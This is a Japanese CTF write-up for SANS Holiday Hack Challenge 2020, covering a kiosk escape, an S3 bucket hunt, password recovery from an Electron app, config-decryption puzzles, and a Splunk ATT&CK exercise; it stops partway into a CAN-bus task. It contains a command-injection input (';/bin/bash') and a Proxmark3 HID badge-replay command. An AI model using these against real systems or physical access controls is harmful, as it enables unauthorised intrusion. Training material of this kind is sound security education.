2020年12月14日ごろから2021年1月11に開催されていた、SANS Holiday Hack Challenge 2020のwriteupです。
SANS Holiday Hack Challengeとは
ただ問題をひたすら解いていくCTFではなく、ストーリーがあります。そのストーリーに沿った問題があるので、それらを解いていく形式になります。 メインとなるObjective問題と、そのObjective問題のヒントがもらえるターミナル問題があります。
ターミナル問題の一部は別にObjective問題のヒントではないものもあります。
今年のストーリーはこんな感じ
去年の悪役、Tooth Fairyの計画は彼女自身が考えたものではなくJack Frostによるものだった。 今年の悪役はこのJack Frostである。 サンタのKringlecon城は去年より拡張され、とてもにぎわっていた。 しかしサンタのふるまいはどこか変なところがあった。
ストーリーの概要やSANS Holiday Hack Challengeの概要はYoutubeにある通りなので、詳しく知りたい方はこちらへ
あとこのWriteupは端末問題をすべて解いてはいないです。メインに関連する端末問題は解きましたが、それ以外は忘れていました。 今年の私の目標がエンドロールを見ようとしていたので....
ここで書いていない端末問題の解答については、すべての問題を解いている素晴らしいWriteupを@kusuwada氏が書いているので、ぜひそちらもみましょう!!!
Holiday Hack Challengeは今からでも解くことはできるので、面白そうと思った方はぜひ!!
Writeup
1) Uncover Santa's Gift List
Difficulty: 🎄 There is a photo of Santa's Desk on that billboard with his personal gift list. What gift is Santa planning on getting Josh Wright for the holidays? Talk to Jingle Ringford at the bottom of the mountain for advice.
サンタの机にある画像には贈り物のリストがあるが、Josh Wrightへの贈り物は何?という問題
オンラインで画像を編集できるサイトPhotopeaについてJingle Ringfordから教えてもらうので、そのツールを使って渦巻部分を元に戻す
またサンタの机の画像はJingle Ringforがいるエリアにある。
渦巻の部分を投げ縄ツールで選択して、「フィルター」→「歪み」→「トール」で変更すると、Josh Wrightへの贈り物が何かわかる
まだねじれが強いがproxmarkが回答
2) Investigate S3 Bucket
Difficulty: 🎄 When you unwrap the over-wrapped file, what text string is inside the package? Talk to Shinny Upatree in front of the castle for hints on this challenge.
パッケージの中の文字列は何?城の前にいるShinny Upatreeがこの問題のヒントをくれるよとのこと
そのShinny Upatreeのところへ行くとKringle KioskとInvestiate S3 Bucketという端末が見つかる。
Shinny Upatreeと話すと、「Kringle Kioskにアクセスすると、地図やエルフがどこにいるか、あとバッチが手に入るよ。ただ何か問題があるよ」といわれるのでKringlecon Kioskを攻略する
Kringlecon Kiosk
Kringlecon Kioskにアクセスすると最初に但し書きの後に下のようなメニュー画面が表示される。1はお城のマップ、3はエルフの場所がわかるので、今後のためにテキストに落としておくと楽になった。
但し書きの部分にbashを動かしてみてとあるので、このメニューからbashを動かすことが目標だとわかる。
Welcome to our castle, we're so glad to have you with us! Come and browse the kiosk; though our app's a bit suspicious. Poke around, try running bash, please try to come discover, Need our devs who made our app pull/patch to help recover? Escape the menu by launching /bin/bash Press enter to continue... Welcome to the North Pole! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1. Map 2. Code of Conduct and Terms of Use 3. Directory 4. Print Name Badge 5. Exit Please select an item from the menu by entering a single number. Anything else might have ... unintended consequences. Enter choice [1 - 5]
メニュー画面は1-5の入力しか受け付けず、何か悪さできそうなところないかなと探すと、「4. Print Name Badge」で名前を入力するところは自由に入力できるのでここを起点にbashを起動できないかと考える。
結論から言うと名前に;/bin/bashを入力すればOK。ここは受け取った名前をOSのコマンドとかで出力してるなら;を入れることで別のコマンドを受け付けないかなと試してみたら成功した。
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Welcome to the North Pole!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Map
2. Code of Conduct and Terms of Use
3. Directory
4. Print Name Badge
5. Exit
Please select an item from the menu by entering a single number.
Anything else might have ... unintended consequences.
Enter choice [1 - 5] 4
Enter your name (Please avoid special characters, they cause some weird errors)...;/bin/bash
_______________________
< Santa's Little Helper >
-----------------------
\
\ \_\_ _/_/
\ \__/
(oo)\_______
(__)\ )\/\
||----w |
|| ||
___ _
/ __| _ _ __ __ ___ ___ ___ | |
\__ \ | +| | / _| / _| / -_) (_-< (_-< |_|
|___/ \_,_| \__|_ \__|_ \___| /__/_ /__/_ _(_)_
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_| """ |
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
Type 'exit' to return to the menu.
shinny@559359319b4f:~$
bashを起動した後に、Shiny Upatreeに再度話しかけるとObjective2 のヒントがもらえる。
Investigate S3 Bucket
Investigate S3 Bucketの端末を開くとメッセージが出力され、かつファイルの中身を見てみるとTIPSがあるのでそちらも表示してみる。
するとこの問題は端末内で完結し、クラウドにデータアセットがあると教えてくれる。
Can you help me? Santa has been experimenting with new wrapping technology, and we've run into a ribbon-curling nightmare! We store our essential data assets in the cloud, and what a joy it's been! Except I don't remember where, and the Wrapper3000 is on the fritz! Can you find the missing package, and unwrap it all the way? Hints: Use the file command to identify a file type. You can also examine tool help using the man command. Search all man pages for a string such as a file extension using the apropos command. To see this help again, run cat /etc/motd. elf@f1f2de7874aa:~$ ls TIPS bucket_finder elf@f1f2de7874aa:~$ cat TIPS # TIPS - If you need an editor to create a file you can run nano (vim is also available). - Everything you need to solve this challenge is provided in this terminal session. elf@f1f2de7874aa:~$
次にbucket_finderディレクトリのREADMEを見てみると、S3の公開されているバケットを探してダウンロードするツールが用意されている。
このツール調べると公開されているツールのようで検索してみるとツールの使い方およびAmazonのS3 Bucketに関する解説も見つかる。
Blog, Whats in Amazon's buckets? - DigiNinja
上の記事を見るとS3のバケットのURLはリージョンとマッピングされており、アイルランドにあるバケットに対して、東京のURLでアクセスしてもリダイレクトしてくれるそうだ。
このツールはリダイレクト込みで、バケットが公開状態か非公開状態かを調べてくれ、また公開されているならダウンロードしてくれるツールということがわかる。
ここまでくればあとはS3バケットの名前を予測して、ツールを動かせばよい。最初に端末にアクセスした際に緑色の文字で表示されているWrapper3000というのが怪しそうなので、これをwordlistsに加えてツールを実行する。
※S3 のバケット名はすべて小文字なのでWは小文字にしておく
elf@f1f2de7874aa:~/bucket_finder$ cat wordlist
kringlecastle
wrapper
santa
wrapper3000
elf@f1f2de7874aa:~/bucket_finder$ ./bucket_finder.rb --download --region us wordlist
http://s3.amazonaws.com/kringlecastle
Bucket found but access denied: kringlecastle
http://s3.amazonaws.com/wrapper
Bucket found but access denied: wrapper
http://s3.amazonaws.com/santa
Bucket santa redirects to: santa.s3.amazonaws.com
http://santa.s3.amazonaws.com/
Bucket found but access denied: santa
http://s3.amazonaws.com/wrapper3000
Bucket Found: wrapper3000 ( http://s3.amazonaws.com/wrapper3000 )
<Downloaded> http://s3.amazonaws.com/wrapper3000/package
elf@f1f2de7874aa:~/bucket_finder$ ls
README bucket_finder.rb wordlist wrapper3000
elf@f1f2de7874aa:~/bucket_finder$
公開されていたS3バケットが見つかり、中身を確認するとどうやらBase64っぽい文字列、でコードしたものをファイルに書き込むとzipファイルであることがわかる。
elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ cat package | base64 -d >> file.dat elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ file file.dat file.dat: Zip archive data, at least v1.0 to extract elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ unzip file.dat Archive: file.dat extracting: package.txt.Z.xz.xxd.tar.bz2
またunzipするとpackage.txt.Z.xz.xxd.tar.bz2というファイルが書き出される。まぁそれぞれの形式ででコードされているだろうと思われるので愚直に解答していく。
elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ tar -xvf package.txt.Z.xz.xxd.tar.bz2 package.txt.Z.xz.xxd elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ xxd -r package.txt.Z.xz.xxd > package.txt.Z.xz elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ xz -d package.txt.Z.xz elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ uncompress package.txt.Z elf@f1f2de7874aa:~/bucket_finder/wrapper3000$ cat package.txt North Pole: The Frostiest Place on Earth
North Pole: The Frostiest Place on Earthが答え
3) Point-of-Sale Password Recovery
Difficulty: 🎄 Help Sugarplum Mary in the Courtyard find the supervisor password for the point-of-sale terminal. What's the password?
Sugarplum Maryのもとへ向かうとLinux PrimerとSanta shopの端末がある。Linux Primerを解くとSanta shopのヒントがもらえるんだろうなと予想がつく
Linux Primer
起動するとmunchkinにLollipopを盗まれたので、munchkinを捕まえよう。hintmeと打つとヒントがもらえるよとある。
Linuxのコマンド関連の問題が出されて、それに対して答えていけばよい。
Q. Perform a directory listing of your home directory to find a munchkin and retrieve a lollipop! $ ls Q. Now find the munchkin inside the munchkin. $ cat munchkin_19315479765589239 Q. Great, now remove the munchkin in your home directory. $ rm munchkin_1931547976558923 Q. Print the present working directory using a command. $ pwd Q. Good job but it looks like another munchkin hid itself in you home directory. Find the hidden munchkin! $ ls -la Q. Excellent, now find the munchkin in your command history. $ history Q. Find the munchkin in your environment variables. $ export Q. Next, head into the workshop. $ cd workshop Q. A munchkin is hiding in one of the workshop toolboxes. Use "grep" while ignoring case to find which toolbox the munchkin is in. $ grep -rni "munchkin" * Q. A muchkin is blocking the lollipop_engine from starting. Run the lollipop_engine binary to retrieve this munchkin. $ chmod +x lollipop_engine $ ./lollipop_engine Q. Munchkins have blown the fuses in /home/elf/workshop/electrical. cd into electrical and rename blown_fuse0 to fuse0. $ cd electrical/ $ mv blown_fuse0 fuse0 Q. Now, make a symbolic link (symlink) named fuse1 that points to fuse0 $ ln -s fuse0 fuse1 Q. Make a copy of fuse1 named fuse2. $ cp fuse1 fuse2 Q. We need to make sure munchkins don't come back. Add the characters "MUNCHKIN_REPELLENT" into the file fuse2. $ echo "MUNCHKIN_REPELLENT" >> fuse2 Q. Find the munchkin somewhere in /opt/munchkin_den $ find ./ -iname '*munchkin*' Q. Find the file somewhere in /opt/munchkin_den that is owned by the user munchkin. $ id munchkin uid=1052(munchkin) gid=1052(munchkin) groups=1052(munchkin) $ find ./ -uid 1052 Q. Find the file created by munchkins that is greater than 108 kilobytes and less than 110 kilobytes located somewhere in /opt/munchkin_den. $ find ./ -size -110k -size +108k Q. List running processes to find another munchkin. $ ps aux Q. The 14516_munchkin process is listening on a tcp port. Use a command to have the only listening port display to the screen. $ netstat -napt 80 Q. The service listening on port 54321 is an HTTP server. Interact with this server to retrieve the last munchkin. $ curl localhost:54321 Q. Your final task is to stop the 14516_munchkin process to collect the remaining lollipops. $ kill 23343 Congratulations, you caught all the munchkins and retrieved all the lollipops! Type "exit" to close...
ここまでの問いに答えた後、Sugarplum Maryに話しかけるとヒントがもらえるようになる。
Santa shop
Santa shopの端末を開くとオフラインで使えるexeを渡される。これを適当な仮想マシンで実行してみるとどうやらSanta shopのインストーラであることがわかる。
インストールして、実行するとパスワードが要求される。
アイコンからElectronで作ったアプリっぽいなと思ったが、Linux PrimerのヒントにもElectronのアプリとわかる。
またasarというツールを使うと、ソースコードがわかるということと使い方のガイドもヒントから分かった。
なのであとはソースコードを展開してみる。
C:\Users\user>cd C:\Users\user\AppData\Local\Programs\santa-shop C:\Users\user\AppData\Local\Programs\santa-shop>cd resources C:\Users\user\AppData\Local\Programs\santa-shop\resources>mkdir sourcecode C:\Users\user\AppData\Local\Programs\santa-shop\resources>asar extract app.asar sourcecode C:\Users\user\AppData\Local\Programs\santa-shop\resources>
展開されたのが下の図、この中のmain.jsを見るとパスワードが書いてある
santapass
4) Operate the Santavator
Difficulty: 🎄🎄 Talk to Pepper Minstix in the entryway to get some hints about the Santavator.
Pepper Minstixに話しかけてSantavatorのヒントをもらってくださいとある。
話しかけるとtmuxデタッチして困ってるといわれる。横の端末からアタッチしてあげればよさそう
Unescape Tmux
$ tmux ls 0: 1 windows (created Thu Jan 14 14:53:24 2021) [80x24] $ tmux a -t 0 ..............................'.''''''.''''''''''''' .........................................''''''''''' ................................,:lccc:;,'...''''''' .............................';loodxkkxxdlc;'..''''' ............................,:ccllcldx0dxxdoc..''''' ...........................;ccclooodkOkok0OOx:..'''' .........................':cccllodxxkkkOkxdxx;....'' ........................,cccllooddxkOOOkOxoo'.....'' ......................';:cclllccllodO0Okkkx;...'''.. .....................:llollclclccccclokc::'......... ...................;ddollllllllcccccccl;............ ..................:xdooddoooolclllllolld;........... .................'xxoodxxxdoooooooxkdooox'.......... .................,xxkxdxkkxxdddddddxkkxdxl....'..... .................'xOkooddxkkxxdddxxkkxxxxx'.......'. ..................oOkddxkkkkdxxdddxxxxxxdd:......'.' .................';k0xxkxxOxdddddoodxdxkkx:....''''' ................'',o0xdddxkxdxdodddddkkkxxc....''''' ................',,:OK0kkOOxddddxxxddxxkxd:''''''''' .............',;:cccdKXKOkkOOxkxdxxxxxxkOx;''''''''' ...........:oxdddxkkxOXXOxxkxxkkkkkkkxxdxx,,'''''''' .......''':c:,..'coodOO00OOOO00kxOkK0KkO0d,,'''''''' ...;cllc::clddooddOkxoccccccloddxxO0KK0KKOc:;,'''''' 'ldolcc:::lldxkOxkO000OOOOkkxxdddxoooooooooodxxxddol xxlcc:::::xolldddxOOdddxxxkkOOO0000000xkOkkxddoooooo lo:::cccc::ldoodooxd,;lxxkkO0OOOOOOOOOOOOOO000000000 locclccccccccldkxdkk:,;cdxkOKXXXKKKKKXXKk::::cllodxk xxollllcccllcodkOkO0:,,,:dkOOKKXXXKKKXXKl,,''''''''' xxkolllllllllodkO0KO;,,,;;lxO00KKXKKKKK0c;,,,,,,,,,, ,dxxxdoooollodxk0KOolc:::::cdO00KK00K000c;,,,,,,,,,; ..:xkOOkdoxxkOO0OxoooooolooodxOO00Ok0kk0oc:;;;;;;;;; ....:dkOddOO0OkdoolllllloooddxOOOOOkkkkOdllccccccccc You found her! Thank you!!!
この後に話しかけるとSantavatorを動かすにはカギと、赤、青、黄のバルブが必要だと教えてもらう。カギについてはSparkle Redberryに聞いてと言われる。
エレベータ前にいるSparkle Redberryに話しかけると、Santavatorの使い方を教えてくれる。光を操って緑、赤、黄の光を流し込めばよい
そのためにバルブが必要になる。このバルブはKringllecon Castleを散策してたら見つけたので、具体的にどこにあったかは忘れたが、緑のバルブはSantavatorを使わずとも入手でき、赤のバルブは緑を点灯した後に行けるTalksに、黄のバルブは赤と緑を点灯した後に行ける屋上かWorkshopにあった気がする。
あとは適当なオブジェクトも見つかるので、それらを駆使して点灯させる。
これでクリア
5) Open HID Lock
Difficulty: 🎄🎄 Open the HID lock in the Workshop. Talk to Bushy Evergreen near the talk tracks for hints on this challenge. You may also visit Fitzy Shortstack in the kitchen for tips.
5問目はWorkshopのHIDロックを開けとあるが、Workshopのフロアにはボタンがなくて行けない。
しょうがないのでBushy Evergreen‘に会いに行ってヒントをもらうことにする。あとFitzy Shortstack`からも何かもらえるそうだ。
Speaker UNPrep
`Bushy Evergreen‘に会いに行くと、ドアを開けようとしているが、Alabaster Snonwballが作った問題が解けないとのこと。これは3問あるので順番に説いていく
1問目
./doorプログラムを実行するとパスワードを聞かれる。
$ ./door You look at the screen. It wants a password. You roll your eyes - the password is probably stored right in the binary. There's gotta be a tool for this... What do you enter? > hello Checking...... Beep boop invalid password
適当に入力してもだめだがBushy Evergreenがバイナリの中の文字を見る方法は?みたいなことを言ってるのでstringsコマンドを使うとパスワードが見つかる
パスワードはOp3nTheD00r
2問目
1問目をクリアするとヒントをくれる。どうやらここでドアは空いてたらしいが私は気づかなかった。話の内容から電気もついてないので助けてみたいなことが書かれているので、今度はlightsプログラムに挑戦する。
$ ./lights The speaker unpreparedness room sure is dark, you're thinking (assuming you've opened the door; otherwise, you wonder how dark it actually is) You wonder how to turn the lights on? If only you had some kind of hin--- >>> CONFIGURATION FILE LOADED, SELECT FIELDS DECRYPTED: /home/elf/lights.conf ---t to help figure out the password... I guess you'll just have to make do! The terminal just blinks: Welcome back, elf-technician What do you enter? > hello Checking...... Beep boop invalid password
lights.confを使っているようなので、そのlights.confを見てみる。
$ cat ./lights.conf password: E$ed633d885dcb9b2f3f0118361de4d57752712c27c5316a95d9e5e5b124 name: elf-technician
lights.confを見るとパスワードと名前がある。labディレクトリでlights.confを書き換えられるがここからどうしたらいいか結構悩んだ。
結論はlightc.confを下記のように設定して実行するとパスワード。
CONFIGURATION FILE LOADED, SELECT FIELDS DECRYPTEDというのが最大のヒントだった
~/lab $ cat lights.conf name: E$ed633d885dcb9b2f3f0118361de4d57752712c27c5316a95d9e5e5b124 password: elf-technician ~/lab $ ./lights The speaker unpreparedness room sure is dark, you're thinking (assuming you've opened the door; otherwise, you wonder how dark it actually is) You wonder how to turn the lights on? If only you had some kind of hin--- >>> CONFIGURATION FILE LOADED, SELECT FIELDS DECRYPTED: /home/elf/lab/lights.conf ---t to help figure out the password... I guess you'll just have to make do! The terminal just blinks: Welcome back, Computer-TurnLightsOn What do you enter? >
elf-technitianが表示されていた部分がComputer-TrunLightsOnと表示されている。要は名前やパスワードでなんか暗号化してるところを復号するので、名前とパスワードを入れ替えればパスワードがわかる。
$ ./lights The speaker unpreparedness room sure is dark, you're thinking (assuming you've opened the door; otherwise, you wonder how dark it actually is) You wonder how to turn the lights on? If only you had some kind of hin--- >>> CONFIGURATION FILE LOADED, SELECT FIELDS DECRYPTED: /home/elf/lights.conf ---t to help figure out the password... I guess you'll just have to make do! The terminal just blinks: Welcome back, elf-technician What do you enter? > Computer-TurnLightsOn Checking...... Lights on!
3問目
最後にvending machineに挑戦
labディレクトリにある、vendin_machine.confを削除して実行すると、名前とパスワードを入力し、パスワードに関しては暗号化されて出力される。 この暗号化の仕組みがわかれば答えが出せそう。
こちらもヒントをもらうとAAAAAAAAと入力してみるとどうなる?みたいなことを言われるので試してみるとA*10を試してみる。すると9文字以降は1文字目と一致する。8文字シフトの古典暗号、とわかれば後はマッピングを入手すればよい。Kringleconの端末でもPythonは使えるが、使いやすいわけではないのでマッピング表を基にプログラムを書いておしまい。
~/lab $ ./vending-machines
The elves are hungry!
If the door's still closed or the lights are still off, you know because
you can hear them complaining about the turned-off vending machines!
You can probably make some friends if you can get them back on...
Loading configuration from: /home/elf/lab/vending-machines.json
I wonder what would happen if it couldn't find its config file? Maybe that's
something you could figure out in the lab...
ALERT! ALERT! Configuration file is missing! New Configuration File Creator Activated!
Please enter the name > hello
Please enter the password > AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHHIIIIIIIIJJJJJJJJ
KKKKKKKKLLLLLLLLMMMMMMMMNNNNNNNNOOOOOOOOPPPPPPPPQQQQQQQQRRRRRRRRSSSSSSSSTTTTTTTTUUUUUUUUVVVVVVVVWWWWWWWWXXXX
XXXXYYYYYYYYZZZZZZZZaaaaaaaabbbbbbbbccccccccddddddddeeeeeeeeffffffffgggggggghhhhhhhhiiiiiiiijjjjjjjjkkkkkkkk
llllllllmmmmmmmmnnnnnnnnooooooooppppppppqqqqqqqqrrrrrrrrssssssssttttttttuuuuuuuuvvvvvvvvwwwwwwwwxxxxxxxxyyyy
yyyy00000000111111112222222233333333444444445555555566666666777777778888888899999999
Welcome, hello! It looks like you want to turn the vending machines back on?
Please enter the vending-machine-back-on code > AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHH
HHHHIIIIIIIIJJJJJJJJKKKKKKKKLLLLLLLLMMMMMMMMNNNNNNNNOOOOOOOOPPPPPPPPQQQQQQQQRRRRRRRRSSSSSSSSTTTTTTTTUUUUUUUU
VVVVVVVVWWWWWWWWXXXXXXXXYYYYYYYYZZZZZZZZaaaaaaaabbbbbbbbccccccccddddddddeeeeeeeeffffffffgggggggghhhhhhhhiiii
iiiijjjjjjjjkkkkkkkkllllllllmmmmmmmmnnnnnnnnooooooooppppppppqqqqqqqqrrrrrrrrssssssssttttttttuuuuuuuuvvvvvvvv
wwwwwwwwxxxxxxxxyyyyyyyy00000000111111112222222233333333444444445555555566666666777777778888888899999999
Checking......
That would have enabled the vending machines!
If you have the real password, be sure to run /home/elf/vending-machines
elf@b55d9572419c ~/lab $ cat ./vending-machines.json
{
"name": "hello",
"password": "XiGRehmwDqTpKv7fLbn3UP9Wyv09iu8Qhxkr3zCnHYNNLCeOSFJGRBvYPBubpHYVzka18jGrEA24nILqF14D1GnMQKdxFbK363iZBrdjZE8IMJ3ZxlQsZ4Uisdwjup68mSyVX10sI2SHIMBo4gC7VyoGNp9Tg0akvHBEkVH5t4cXy3VpBslfGtSz0PHMxOl0rQKqjDq2KtqoNicv9VbtacpgGUVBfWhPe9ee6EERORLdlwWbwcZQAYue8wIUrf5xkyYSPafTnnUgokAhM0sw4eOCa8okTqy1o63i07r9fm6W7siFqMvusRQJbhE62XDBRjf2h24c1zM5H8XLYfX8vxPy5NAyqmsuA5PnWSbDcZRCdgTNCujcw9NmuGWzmnRAT7OlJK2X7D7acF1EiL5JQAMU3ehm9ZFH2rDO5LkIpWFLz5zSWJ1YbNtlgophDlgKdTzAYdIdjOx0OoJ6JItvtUjtVXmFSQw4lCgPE6x7"
map = "AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHHIIIIIIIIJJJJJJJJKKKKKKKKLLLLLLLLMMMMMMMMNNNNNNNNOOOOOOOOPPPPPPPPQQQQQQQQRRRRRRRRSSSSSSSSTTTTTTTTUUUUUUUUVVVVVVVVWWWWWWWWXXXXXXXXYYYYYYYYZZZZZZZZaaaaaaaabbbbbbbbccccccccddddddddeeeeeeeeffffffffgggggggghhhhhhhhiiiiiiiijjjjjjjjkkkkkkkkllllllllmmmmmmmmnnnnnnnnooooooooppppppppqqqqqqqqrrrrrrrrssssssssttttttttuuuuuuuuvvvvvvvvwwwwwwwwxxxxxxxxyyyyyyyy00000000111111112222222233333333444444445555555566666666777777778888888899999999"
map_enc ="XiGRehmwDqTpKv7fLbn3UP9Wyv09iu8Qhxkr3zCnHYNNLCeOSFJGRBvYPBubpHYVzka18jGrEA24nILqF14D1GnMQKdxFbK363iZBrdjZE8IMJ3ZxlQsZ4Uisdwjup68mSyVX10sI2SHIMBo4gC7VyoGNp9Tg0akvHBEkVH5t4cXy3VpBslfGtSz0PHMxOl0rQKqjDq2KtqoNicv9VbtacpgGUVBfWhPe9ee6EERORLdlwWbwcZQAYue8wIUrf5xkyYSPafTnnUgokAhM0sw4eOCa8okTqy1o63i07r9fm6W7siFqMvusRQJbhE62XDBRjf2h24c1zM5H8XLYfX8vxPy5NAyqmsuA5PnWSbDcZRCdgTNCujcw9NmuGWzmnRAT7OlJK2X7D7acF1EiL5JQAMU3ehm9ZFH2rDO5LkIpWFLz5zSWJ1YbNtlgophDlgKdTzAYdIdjOx0OoJ6JItvtUjtVXmFSQw4lCgPE6x7"
map_lis = [map[i:i+8] for i in range(0,len(map),8)]
map_enc_lis = [map_enc[i:i+8] for i in range(0,len(map_enc),8)]
pass_enc = "LVEdQPpBwr"
ans_id = []
for i in range(len(pass_enc)):
tmp = i % 8
for j in map_enc_lis:
if pass_enc[i] == j[tmp]:
ans_id.append(map_enc_lis.index(j))
ans = ""
for i in ans_id:
ans += map_lis[i][0]
print(ans)
# CandyCane1
答えはCandyCane1
HID Unlock
ここまでの問題を解いたときに私は隣の扉に入れることに気づき、Workshopのエレベータのボタンを入手できた。これで挑戦権獲得である。
今度はWorkshopのエリアに移動するとWorkshopの部屋の扉が閉まっているため、この扉を開けるのかということがわかる。
Speaker Unprepの1問目doorをクリアすると、この問題を解くにはProxmark3というのが必要と言われている。いろいろ試していて分かったが、この問題はProxmarkを使ってドアを開けるコードをシミュレートする問題だった(最初は何をすればいいのかよくわからなかった)
Wrapping RoomにあるProxmark3端末を入手すると、Open Proxmark3 CLIから端末を開くことができる。
ただこれだけではどうすればエミュレートできるかわからないので、Youtubeの動画を見る。
上記動画の13分くらいで、カードの読み取り方とシミュレートする方法がわかる。ここで、エルフが持ってるカードを読み取ってロックされたドアに対してシミュレートしてみればいいのかとわかる。
適当に探すと3人のカードを見つけれた。もっとあるかもしれないが、見つけたもので開いてしまったので、これ以上は探してない
#db# TAG ID: 2006e22f10 (6024) - Format Len: 26 bit - FC: 113 - Card: 6024 #db# TAG ID: 2006e22f0e (6023) - Format Len: 26 bit - FC: 113 - Card: 6023 #db# TAG ID: 2006e22f0d (6022) - Format Len: 26 bit - FC: 113 - Card: 6022
Workshopの扉の近くで lf hid sim -r 2006e22f0e --fc 113 --cn 6023 のコマンドを打つと、隣の扉が開いた。
扉の奥へ進むと、サンタになれた。
なるほどね、いくつかサンタじゃないと触っちゃいけないオブジェクトがあるってメッセージが出たので、ここからはサンタを操っていくのか。
あ、プロローグでサンタの動きがおかしいってエルフが言ってたのはプレイヤーがサンタを操るからかな?
6) Splunk Challenge
Difficulty: 🎄🎄🎄 Access the Splunk terminal in the Great Room. What is the name of the adversary group that Santa feared would attack KringleCon?
Great RoomにあるSplunkのターミナルにアクセスしてサンタがKringleConを攻撃すると思ってる攻撃者グループの名前を当てろということだ。
Santaでないときには触れなかったSplunkのターミナルが開けるようになっていて、開くとTraining QuestionとChallenge Questionが表示された。
Training Questionから解いていく。問題に関してSplunkで検索してその答えを書いていけばよいっぽい。 問題が多いので、実際はいろいろクエリを検索して進めたが、答えと回答でさくっと書いていく。
Q1. How many distinct MITRE ATT&CK techniques did Alice emulate?
| tstats count where index=* by index | search index=T*-win OR T*-main | rex field=index "(?<technique>t\d+)[\.\-].0*" | stats dc(technique)
答え:13
Q2. What are the names of the two indexes that contain the results of emulating Enterprise ATT&CK technique 1059.003? (Put them in alphabetical order and separate them with a space)
| tstats count where index=t1059.003* by index
答え:t1059.003-main t1059.003-win
Q3. One technique that Santa had us simulate deals with 'system information discovery'. What is the full name of the registry key that is queried to determine the MachineGuid?
答え:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
Q4. According to events recorded by the Splunk Attack Range, when was the first OSTAP related atomic test executed? (Please provide the alphanumeric UTC timestamp.)
OSTAPが関係しているものを答えろとのことなので、OSTAPで検索して、一番古いのを答える。
index = attack | search "Test Name" = OSTAP*
答え:2020-11-30T17:44:15Z
Q5. One Atomic Red Team test executed by the Attack Range makes use of an open source package authored by frgnca on GitHub. According to Sysmon (Event Code 1) events in Splunk, what was the ProcessId associated with the first use of this component?
問題にあるGithubのコードをみるとWindowsAudioDevice-Powershell-Cmdletというコマンドが見つかるので、それで検索する。
index=T1123* | search EventCode=1 | search WindowsAudioDevice-Powershell-Cmdlet
答え:3648
Q6. Alice ran a simulation of an attacker abusing Windows registry run keys. This technique leveraged a multi-line batch file that was also used by a few other techniques. What is the final command of this multi-line batch file used as part of this simulation?
レジストリキーに関する攻撃はT1547ということが調べるとわかる。あとはRgistryにまつわるSysmonのイベントID13で検索してみる。
index = T1547* | search EventCode=13
すると下記のコマンドを実行してることがわかるので、実際に見てみて最後のコマンドを入力すればよし。 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat
回答:quser
Q 7. According to x509 certificate events captured by Zeek (formerly Bro), what is the serial number of the TLS certificate assigned to the Windows domain controller in the attack range?
アリスからのヒントをもらえるので、それをいじったクエリを実行。大量の結果が出るが一つ目のcertificate.issuerにwin-dc-748.attackrange.localとあり、これが合致しそうと考え入力したら正解した。
index=* sourcetype=bro* "certificate.serial"=*
{ [-]
certificate.exponent: 65537
certificate.issuer: CN=win-dc-748.attackrange.local
certificate.key_alg: rsaEncryption
certificate.key_length: 2048
certificate.key_type: rsa
certificate.not_valid_after: 2021-05-29T01:08:57.000000Z
certificate.not_valid_before: 2020-11-27T01:08:57.000000Z
certificate.serial: 55FCEEBB21270D9249E86F4B9DC7AA60
certificate.sig_alg: sha256WithRSAEncryption
certificate.subject: CN=win-dc-748.attackrange.local
certificate.version: 3
id: Fen0DH2KtOxQwt4BFk
ts: 2020-11-30T21:03:50.409634Z
}
答え:55FCEEBB21270D9249E86F4B9DC7AA60
Challenge Q. What is the name of the adversary group that Santa feared would attack KringleCon?
ここまでの問題を解くとBase64でエンコードされた暗号化文字列7FXjP1lyfKbyDK/MChyf36h7をアリスが教えてくれる。これをデコードしたら攻撃グループがわかりそう。
ちなみに暗号はRFC7465ということまで教えてくれる。これはRC4なので、あとはパスワードを探す。
パスワードはサンタのお気に入りのフレーズということでいろんな人に話しかけるとBubble LightingtonからStay frostyというキーワードをもらう。
これであとはCyberchefで復号すると答え
回答:The Lollipop Guild
7) Solve the Sleigh's CAN-D-BUS Problem
Difficulty: 🎄🎄🎄 Jack Frost is somehow inserting malicious messages onto the sleigh's CAN-D bus. We need you to exclude the malicious messages and no others to fix the sleigh. Visit the NetWars room on the roof and talk to Wunorse Openslae for hints.
Can-D-BUSということなので、車関連のネットワーク問題かな推測。
ひとまずNetWar Roomに移動し、CAN-Bus Investigationという端末問題があるので解いていく。
CAN-Bus Investigation
端末を起動すると、下記のメッセージが出力される。またログを確認するとそれっぽいログが記録されている。
Welcome to the CAN bus terminal challenge! In your home folder, there's a CAN bus capture from Santa's sleigh. Some of the data has been cleaned up, so don't worry - it isn't too noisy. What you will see is a record of the engine idling up and down. Also in the data are a LOCK signal, an UNLOCK signal, and one more LOCK. Can you find the UNLOCK? We'd like to encode another key mechanism. Find the decimal portion of the timestamp of the UNLOCK code in candump.log and submit it to ./runtoanswer! (e.g., if the timestamp is 123456.112233, please submit 112233) $ head candump.log (1608926660.800530) vcan0 244#0000000116 (1608926660.812774) vcan0 244#00000001D3 (1608926660.826327) vcan0 244#00000001A6 (1608926660.839338) vcan0 244#00000001A3 (1608926660.852786) vcan0 244#00000001B4 (1608926660.866754) vcan0 244#000000018E (1608926660.879825) vcan0 244#000000015F (1608926660.892934) vcan0 244#0000000103 (1608926660.904816) vcan0 244#0000000181 (1608926660.920799) vcan0 244#000000015F
